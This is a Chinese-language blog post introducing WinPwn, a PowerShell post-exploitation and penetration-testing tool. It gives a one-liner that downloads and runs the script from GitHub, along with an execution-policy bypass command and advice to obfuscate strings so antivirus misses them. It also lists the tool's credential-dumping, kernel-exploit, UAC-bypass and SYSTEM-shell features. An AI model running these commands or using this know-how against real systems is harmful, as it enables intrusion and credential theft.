专栏首页黑白天安全团队域信息收集自动脚本​WinPwn

域信息收集自动脚本​WinPwn

WinPwn

自动化尽可能多的内部渗透测试流程(侦察和开发)具有自动代理识别和集成功能的脚本。

本地调用

powershell.exe -exec bypass -command "& {import-module  C:\Users\17782\Desktop\WinPwn-master\WinPwn-master\offline_WinPwn.ps1;localreconmodules}"

远程下载调用

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')

绕杀软需要自己混淆或者手动对触发器字符串进行编码。

具体功能有:

  • Inveigh ->在新的控制台窗口中执行Inveigh,集成了会话管理(Invoke-TheHash)的SMB-Relay攻击
  • sessionGopher ->执行Sessiongopher询问您参数
  • kittielocal ->
    • 模糊的调用-Mimikatz版本
    • 内存中的Safetykatz
    • 使用rundll32技术转储lsass
    • 下载并运行混淆的Lazagne
    • 转储浏览器凭证
    • 定制的Mimikittenz版本
    • 窃取Wifi凭证
    • 转储SAM文件NTLM哈希
  • localreconmodules ->
    • 收集已安装的软件,易受攻击的软件,共享,网络信息,组,特权等等
    • 检查典型的漏洞,如SMB签名,LLMNR中毒,MITM6,通过HTTP的WSUS
    • 检查Powershell事件日志中的凭证或其他敏感信息
    • 收集浏览器凭证和历史记录
    • 在注册表和文件系统中搜索密码
    • 查找敏感文件(配置文件,RDP文件,Keepass数据库)
    • 在本地系统上搜索.NET Binaries
    • 可选:Get-Computerdetails(Powersploit)和PSRecon
  • domainreconmodules ->
    • 收集各种域信息以进行手动检查
    • 在说明字段中找到广告密码
    • 搜索潜在的敏感域共享文件
    • 枚举不受约束的委派系统/用户
    • 生成猎犬报告
    • 用于域系统的MS17-10扫描仪
    • 适用于域系统的Bluekeep扫描仪
    • SQL Server发现和审核功能-PowerUpSQL
    • MS-RPRN检查域控制器或所有系统
    • Grouper2的组策略审核
    • 使用ADRecon在CSV文件(如果已安装Excel,则为XLS)中生成AD报告。
    • 检查打印机的常见问题
    • 搜索基于资源的约束委派攻击路径
  • Privescmodules
    • itm4ns调用-PrivescCheck
    • winPEAS
    • Powersploits PowerUp Allchecks,Sherlock,GPPPasswords
    • DLL劫持,文件权限,注册表权限和弱键,烂/多汁土豆检查
  • kernelexploits ->
    • MS15-077-(XP / Vista / Win7 / Win8 / 2000/2003/2008/2012)仅x86!
    • MS16-032-(2008/7/8/10/2012)!
    • MS16-135-(仅WS2k16)!
    • CVE-2018-8120-2018年5月,Windows 7 SP1 / 2008 SP2,2008 R2 SP1!
    • CVE-2019-0841-2019年4月!
    • CVE-2019-1069-Polarbear硬链接,需要凭据-2019年6月!
    • CVE-2019-1129 / 1130-竞争状况,需要多个核心-2019年7月!
    • CVE-2019-1215-2019年9月-仅x64!
    • CVE-2020-0638-2020年2月-仅x64!
    • CVE-2020-0796-SMBGhost
  • UACBypass ->
    • UAC Magic,基于James Forshaw在UAC上的三篇文章
    • UAC绕过cmstp技术,作者:Oddvar Moe
    • DiskCleanup UAC旁路,James Forshaw提供
    • DccwBypassUAC技术,作者Ernesto Fernandez和Thomas Vanhoutte
  • SYSTEMShell ->
    • 使用CreateProcess弹出系统shell
    • 使用NamedPipe模拟模仿Pop System Shell
    • 使用令牌操作的Pop System Shell
    • 使用UsoClient DLL加载或CreateProcess绑定系统shell

更多功能,大家可以自行到github上看文档,这个工具不错的。

https://github.com/S3cur3Th1sSh1t/WinPwn#sessiongopher---executes-sessiongopher-asking-you-for-parameters

本文分享自微信公众号 - 黑白天(HBT-SEC),作者:李木

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-07-26

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Jboss漏洞利用总结

    访问控制不严导致的漏洞 Jboss管理控制台 Jboss4.x jboss 4.x 及其之前的版本 console 管理路径为 /jmx-console/ 和 ...

    cn0sec
  • 使用reGeorg+Proxifier实现内网穿透

    cn0sec
  • 密码重置姿势总结​

    (自己的号)130229364xx 密码:123456@qq.com id:m6454245

    cn0sec
  • 2018-08-02 IntelliJ IDEA - Debug 调试多线程程序IntelliJ IDEA - Debug 调试多线程程序

    https://blog.csdn.net/nextyu/article/details/79039566

    Albert陈凯
  • Spring中@Transactional事务回滚(含实例详细讲解,附源码) - 小宝鸽 - CSDN博客

    在了解@Transactional怎么用之前我们必须要先知道@Transactional有什么用。下面举个栗子:比如一个部门里面有很多成员,这两者分别保存在部门...

    Java编程指南
  • Spring中@Transactional事务回滚实例及源码

    Spring中@Transactional事务回滚实例及源码 一、使用场景举例 在了解@Transactional怎么用之前我们必须要先知道@Transacti...

    用户1289394
  • MacOS CryptoMining恶意软件的崛起

    在我们对Cryptojacking进行介绍之后,让我们仔细看看目前macOS平台上的情况。

    安恒网络空间安全讲武堂
  • 第八节dom以及dom库的封装

    河湾欢儿
  • nodejs的简单爬虫

    使用nodejs爬虫豆瓣电影数据,要爬取的页面地址:https://movie.douban.com/top250,简单实现如下: 'use strict'; ...

    用户1141560
  • 缄默期过后6小时,搜狗王小川回应一切(他说:会叫的狗不咬人)

    李根 发自 乌镇米仓 量子位 报道 | 公众号 QbitAI ? 北京时间12月4日下午13点,纽约时间12月4日午夜0点。搜狗上市缄默期正式结束,王小川可以...

    量子位

扫码关注云+社区

领取腾讯云代金券